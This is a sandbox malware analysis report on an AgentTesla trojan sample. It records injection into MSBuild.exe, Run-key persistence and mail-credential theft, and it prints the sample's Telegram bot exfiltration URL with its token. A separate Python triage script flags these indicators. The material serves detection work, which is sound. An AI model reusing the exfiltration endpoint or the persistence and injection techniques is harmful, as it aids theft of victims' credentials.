                    Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 10 other signatures

                    • SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe started. Dropped: SecuriteInfo.com.T...Q.MTB.14730.exe.log (ASCII). Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes. Started MSBuild.exe.
                    • ykVBUY.exe started (two instances); each instance started conhost.exe.
                    • MSBuild.exe: DNS/IP: api.telegram.org 149.154.167.220, 443, 49768, TELEGRAMRU, United Kingdom. Dropped: C:\Users\user\AppData\Roaming\...\ykVBUY.exe (PE32); C:\Windows\System32\drivers\etc\hosts (ASCII). Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); 5 other signatures.

                    Source | Detection | Scanner | Label
                    SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | 26% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
                    SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | 100% | Joe Sandbox ML |

                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | 0% | Virustotal |
                    C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | 0% | Metadefender |
                    C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | 0% | ReversingLabs |

                    Source | Detection | Scanner | Label
                    9.0.MSBuild.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
                    9.0.MSBuild.exe.400000.1.unpack | 100% | Avira | TR/Spy.Gen8
                    9.0.MSBuild.exe.400000.3.unpack | 100% | Avira | TR/Spy.Gen8
                    9.0.MSBuild.exe.400000.2.unpack | 100% | Avira | TR/Spy.Gen8
                    9.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
                    9.0.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
                    No Antivirus matches
                    Source | Detection | Scanner | Label
                    http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
                    http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | URL Reputation | safe
                    http://www.tiro.com | 0% | URL Reputation | safe
                    http://www.goodfont.co.kr | 0% | URL Reputation | safe
                    http://www.carterandcone.coml | 0% | URL Reputation | safe
                    http://www.sajatypeworks.com | 0% | URL Reputation | safe
                    http://www.typography.netD | 0% | URL Reputation | safe
                    http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
                    http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
                    http://fontfabrik.com | 0% | URL Reputation | safe
                    http://www.founder.com.cn/cn | 0% | URL Reputation | safe
                    https://api.telegram.org4 | 0% | URL Reputation | safe
                    http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
                    http://UhwhaG.com | 0% | Avira URL Cloud | safe
                    http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | URL Reputation | safe
                    http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
                    http://www.sandoll.co.kr | 0% | URL Reputation | safe
                    http://www.urwpp.deDPlease | 0% | URL Reputation | safe
                    http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
                    http://www.sakkal.com | 0% | URL Reputation | safe
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    api.telegram.org | 149.154.167.220 | true | false | | high

                    Name | Malicious | Antivirus Detection | Reputation
                    https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument | false | | high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.com/designersGSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designers/?SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.orgMSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designers?SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwMSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.tiro.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designersSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.goodfont.co.krSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocumentdocument-----MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.carterandcone.comlSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sajatypeworks.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.typography.netDSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://fontfabrik.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.founder.com.cn/cnSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://api.telegram.org4MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers/frere-user.htmlSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://UhwhaG.comMSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://DynDns.comDynDNSnamejidpasswordPsi/PsiMSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers8SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
http://www.fonts.com | source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
http://www.sandoll.co.kr | source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | malicious: false | AV detection: URL Reputation: safe | reputation: unknown
http://www.urwpp.deDPlease | source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | malicious: false | AV detection: URL Reputation: safe | reputation: unknown
http://www.zhongyicts.com.cn | source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | malicious: false | AV detection: URL Reputation: safe | reputation: unknown
http://api.telegram.org | source: MSBuild.exe, 00000009.00000002.529774217.00000000031DB000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | source: MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
http://www.sakkal.com | source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | malicious: false | AV detection: URL Reputation: safe | reputation: unknown
IP               Domain            Country         ASN    ASN name    Malicious
149.154.167.220  api.telegram.org  United Kingdom  62041  TELEGRAMRU  false
                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:620228
Start date and time: 2022-05-04 14:36:07 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 11m 30s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Sample file name:SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.5438 (renamed file extension from 5438 to exe)
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 29
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.adwa.spyw.evad.winEXE@7/6@1/1
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HDC Information:
                                                      • Successful, ratio: 1.1% (good quality ratio 1%)
                                                      • Quality average: 39.8%
                                                      • Quality standard deviation: 21%
                                                      HCA Information:
                                                      • Successful, ratio: 98%
                                                      • Number of executed functions: 134
                                                      • Number of non-executed functions: 5
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                      • Excluded IPs from analysis (whitelisted): 20.40.136.238, 23.211.6.115, 40.126.32.133, 20.190.160.14, 20.190.160.20, 40.126.32.140, 40.126.32.76, 40.126.32.72, 20.190.160.17, 40.126.32.74, 23.35.236.56, 20.82.210.154, 20.40.129.122, 80.67.82.211, 80.67.82.235, 20.54.89.106, 52.152.110.14, 52.242.101.226, 20.223.24.244
                                                      • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, sls.update.microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, iris-de-prod-azsc-frc-b.francecentral.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, store-images.s-microsoft.com, iris-de-prod-azsc-frc.francecentral.cloudapp.azure.com, displaycatalog-rp.md
                                                      • Execution Graph export aborted for target ykVBUY.exe, PID 2976 because it is empty
                                                      • Execution Graph export aborted for target ykVBUY.exe, PID 5256 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
14:37:39  API Interceptor  1x Sleep call for process SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe modified
14:37:52  API Interceptor  615x Sleep call for process MSBuild.exe modified
14:37:58  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, value ykVBUY = C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
14:38:06  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run, value ykVBUY = C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
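The timeline above contains the two pivots a responder would actually act on: a Run value named ykVBUY pointing into %APPDATA%\Roaming (reported under both the HKCU and HKCU64 key paths), and MSBuild.exe, a build tool with no reason to talk to Telegram, carrying the api.telegram.org string in memory while issuing hundreds of sleep calls. Note that the URL table rates http://api.telegram.org as reputation "high" and not malicious: the Telegram bot API is legitimate infrastructure that AgentTesla abuses for exfiltration, so reputation lookups on the destination will never flag it and detection has to key on the source process. The following Python is an added example, not part of the Joe Sandbox report or of Joe Security's tooling. It runs a few rules over a constructed Sysmon-style key=value event log; the log lines, the field names, the process allow-list and the list of injection targets are assumptions made for the example, while the indicators (the Run value, api.telegram.org / 149.154.167.220, and the JA3 hash from the context section) are the ones this report lists.

```python
"""Added triage example (not Joe Sandbox code): run a few detection rules over a
Sysmon-style event log and flag the indicators listed in this report.
Log format, field names, allow-list and injection-target list are assumptions."""
import re
from dataclasses import dataclass

# Indicators taken from the report above.
TELEGRAM_HOST = "api.telegram.org"
TELEGRAM_IP = "149.154.167.220"
REPORT_JA3 = "3b5074b1b5d032e5620f69f9f700ff0e"

RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
USER_PATH_RE = re.compile(
    r"\\(AppData\\(Roaming|Local)|Users\\[^\\]+\\Downloads|Windows\\Temp)\\", re.I)

# Assumed allow-list: processes with a legitimate reason to reach Telegram.
TELEGRAM_ALLOWED = {"telegram.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Assumed list of .NET framework utilities that .NET loaders commonly inject
# their payload into; MSBuild.exe is the one carrying the Telegram string here.
INJECTION_TARGETS = {"msbuild.exe", "regsvcs.exe", "regasm.exe",
                     "installutil.exe", "aspnet_compiler.exe"}


@dataclass
class Finding:
    rule: str
    detail: str


def parse_event(line: str) -> dict:
    """Parse one 'key=value; key=value' line (constructed format)."""
    fields = {}
    for part in line.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def image_name(ev: dict) -> str:
    """Lower-cased file name of the event's process image."""
    return ev.get("image", "").rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list:
    findings = []
    image = image_name(ev)
    if ev.get("type") == "registry_set" and RUN_KEY_RE.search(ev.get("target", "")):
        data = ev.get("details", "")
        # ykVBUY persists from %APPDATA%\Roaming; a Run value pointing at a
        # user-writable directory is the tell, whatever the value name is.
        if USER_PATH_RE.search(data):
            findings.append(Finding("persistence.run_key_user_path",
                                    f"{image}: {ev['target']} = {data}"))
    elif ev.get("type") == "network_connect":
        to_telegram = (ev.get("dest_host") == TELEGRAM_HOST
                       or ev.get("dest_ip") == TELEGRAM_IP)
        if to_telegram and image not in TELEGRAM_ALLOWED:
            severity = "high" if image in INJECTION_TARGETS else "medium"
            findings.append(Finding(f"c2.telegram_api.{severity}",
                                    f"{image} -> {ev.get('dest_host') or ev.get('dest_ip')}"))
        # The JA3 hash is shared by ordinary .NET clients, so it only counts
        # together with a suspicious source process.
        if ev.get("ja3") == REPORT_JA3 and image in INJECTION_TARGETS:
            findings.append(Finding("tls.report_ja3_from_injection_target",
                                    f"{image} ja3={REPORT_JA3}"))
    return findings


def triage(lines) -> list:
    """Return every Finding raised over the given event lines, in order."""
    findings = []
    for line in lines:
        if line.strip():
            findings.extend(check_event(parse_event(line)))
    return findings


# Constructed events modelled on the report's timeline and network data.
# The chrome.exe JA3 value and the fonts.com IP are placeholders.
SAMPLE_LOG = r"""
type=registry_set; image=C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe; target=HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ykVBUY; details=C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
type=network_connect; image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; dest_host=api.telegram.org; dest_ip=149.154.167.220; dest_port=443; ja3=3b5074b1b5d032e5620f69f9f700ff0e
type=network_connect; image=C:\Program Files\Google\Chrome\Application\chrome.exe; dest_host=api.telegram.org; dest_ip=149.154.167.220; dest_port=443; ja3=00000000000000000000000000000000
type=registry_set; image=C:\Program Files\Vendor\setup.exe; target=HKCU\Software\Microsoft\Windows\CurrentVersion\Run\VendorTray; details=C:\Program Files\Vendor\tray.exe
type=network_connect; image=C:\Windows\System32\svchost.exe; dest_host=www.fonts.com; dest_ip=203.0.113.10; dest_port=80
""".splitlines()

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"[{f.rule}] {f.detail}")
```

Run stand-alone, the block reports the Run-key write and two findings for MSBuild.exe (the Telegram connection and the JA3 match) and stays silent on the browser, the vendor installer and svchost. The JA3 rule is deliberately conditional: the same fingerprint turns up under unrelated submissions in the context list below (installers, .xll files, URLs), consistent with a generic Windows TLS-stack fingerprint rather than anything AgentTesla-specific, so on its own it would only add noise.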
Context for IP 149.154.167.220 (other Joe Sandbox submissions that contacted this IP; every one is detected as malicious):
  Recibo de la transacci#U00f3n.PDF.exe
  SecuriteInfo.com.Variant.Ursu.725994.7033.exe
  Payment Advice 10376525832022.exe
  PO#7100459206.exe
  68e7a0fa9f7dbbb34bc4bad97690ea72.exe
  SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
  Maersk Your Transport Plan has Changed.vbs
  New DHL pending delivery documentation.exe
  BL-SHIPPING INVOICE DOCS.exe
  Recibo de la transacci#U00f3n.PDF.exe
  PR 00120181213.xlsx
  GhpGcRg80g.exe
  Arrival_Notice_BL_No_607954658.vbs
  commercial invoice.vbs
  Recibo de la transacci#U00f3n.exe
  doc2022020500991001991.exe
  Payment Advice 10298642022.exe
  doc2022050200100`010100.pdf.exe
  Aviso de Pago 28 Abril 2022.pdf.exe
  Swift_Confirmation_copy_MT103.exe
Context for domain api.telegram.org (other submissions that resolved this domain; every one is detected as malicious and each resolved it to 149.154.167.220):
  Recibo de la transacci#U00f3n.PDF.exe
  SecuriteInfo.com.Variant.Ursu.725994.7033.exe
  Payment Advice 10376525832022.exe
  PO#7100459206.exe
  68e7a0fa9f7dbbb34bc4bad97690ea72.exe
  SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
  Maersk Your Transport Plan has Changed.vbs
  New DHL pending delivery documentation.exe
  BL-SHIPPING INVOICE DOCS.exe
  Recibo de la transacci#U00f3n.PDF.exe
  PR 00120181213.xlsx
  GhpGcRg80g.exe
  Arrival_Notice_BL_No_607954658.vbs
  commercial invoice.vbs
  Recibo de la transacci#U00f3n.exe
  doc2022020500991001991.exe
  Payment Advice 10298642022.exe
  doc2022050200100`010100.pdf.exe
  Aviso de Pago 28 Abril 2022.pdf.exe
  Swift_Confirmation_copy_MT103.exe
Context for ASN TELEGRAMRU (other submissions that contacted this ASN; every one is detected as malicious; contacted IP in parentheses):
  Recibo de la transacci#U00f3n.PDF.exe (149.154.167.220)
  DCC559C45ECF4159655411999117728F288C7E50C78A2.exe (149.154.167.99)
  SecuriteInfo.com.Variant.Ursu.725994.7033.exe (149.154.167.220)
  Payment Advice 10376525832022.exe (149.154.167.220)
  PO#7100459206.exe (149.154.167.220)
  68e7a0fa9f7dbbb34bc4bad97690ea72.exe (149.154.167.220)
  SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe (149.154.167.220)
  Maersk Your Transport Plan has Changed.vbs (149.154.167.220)
  New DHL pending delivery documentation.exe (149.154.167.220)
  BL-SHIPPING INVOICE DOCS.exe (149.154.167.220)
  Recibo de la transacci#U00f3n.PDF.exe (149.154.167.220)
  PR 00120181213.xlsx (149.154.167.220)
  GhpGcRg80g.exe (149.154.167.220)
  VILXNkZtGO.exe (149.154.167.99)
  9Rea46dm7V.exe (149.154.167.99)
  Arrival_Notice_BL_No_607954658.vbs (149.154.167.220)
  commercial invoice.vbs (149.154.167.220)
  Recibo de la transacci#U00f3n.exe (149.154.167.220)
  doc2022020500991001991.exe (149.154.167.220)
  Payment Advice 10298642022.exe (149.154.167.220)
Context for JA3 fingerprint 3b5074b1b5d032e5620f69f9f700ff0e (other submissions whose TLS client produced the same fingerprint; every one is detected as malicious and each contacted 149.154.167.220):
  Recibo de la transacci#U00f3n.PDF.exe
  5rvyx5tjz6.exe
  DUCSetup_v4_1_1.exe
  swift transfer_20-04-22.xlsx.exe
  HTtp://F0.tel:8080/XzNJZufp7q4/DMES-WS-SEC?M9A14903
  PO#7100459206.exe
  SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
  https://www.resourceco-au.com/?email=carlos.raso@coasit.org.au
  Samples.xll
  PO.xll
  HttP://J4r.XyZ:8080/D4SfJOy4yjH/PO170026713=ylb5900
  BANKING SLIP -30% DEPOSIT ZHONGLIAN YONGSHENG SPECIAL.exe
  SecuriteInfo.com.ArtemisDEAFCB87BC59.30021.exe
  RNoQrxkEKl.exe
  Maersk Your Transport Plan has Changed.vbs
  New DHL pending delivery documentation.exe
  Pnkfvrn.exe
  Purchase Order.exe
  MgOelF3Myo.exe
  QPG5coTUH4.exe
Context for dropped file C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe (other submissions associated with the same dropped file; every one is detected as malicious):
  sublime.exe
  Pnkfvrn.exe
  ( StmItaly S.R.L. Citazione ).exe
  #U65b0#U547d#U4ee4___xls.exe
  SALISBUSRY ITEMS - PO-1128-2022.exe
  invoices.exe
  SecuriteInfo.com.W32.AIDetectNet.01.26448.exe
  product list .exe
  invoice.exe
  swift.exe
  QtPqvVRIQx.exe
  Diagram Image.exe
  8C363578 & 8C366195.exe
  z_CC front and back jpg.exe
  8SgJVjkAua.exe
  IMUSHH30643885.exe
  xyUZcqbbfL.exe
  RFQ06112020149.PDF.exe
  CertUtil.exe
  Quotation9011332.pdf.exe
                                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1308
Entropy (8bit):5.345811588615766
Encrypted:false
SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4FsXE8:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHJ
MD5:EA78C102145ED608EF0E407B978AF339
SHA1:66C9179ED9675B9271A97AB1FC878077E09AB731
SHA-256:8BF01E0C445BD07C0B4EDC7199B7E17DAF1CA55CA52D4A6EAC4EF211C2B1A73E
SHA-512:8C04139A1FC3C3BDACB680EC443615A43EB18E73B5A0CFCA644CB4A5E71746B275B3E238DD1A5A205405313E457BB75F9BBB93277C67AFA5D78DCFA30E5DA02B
Malicious:true
Reputation:moderate, very likely benign file
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
Process:C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):841
Entropy (8bit):5.356220854328477
Encrypted:false
SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoIvEE4xDqE4j:MxHKXwYHKhQnoPtHoxHwvEHxDqHj
MD5:486580834B084C92AE1F3866166C9C34
SHA1:C8EB7E1CEF55A6C9EB931487E9AA4A2098AACEDF
SHA-256:65C5B1213E371D449E2A239557A5F250FEA1D3473A1B5C4C5FF7492085F663FB
SHA-512:2C54B638A52AA87F47CAB50859EFF98F07DA02993A596686B5617BA99E73ABFCD104F0F33209E24AFB32E66B4B8A225D4DB2CC79631540C21E7E8C4573DFD457
Malicious:false
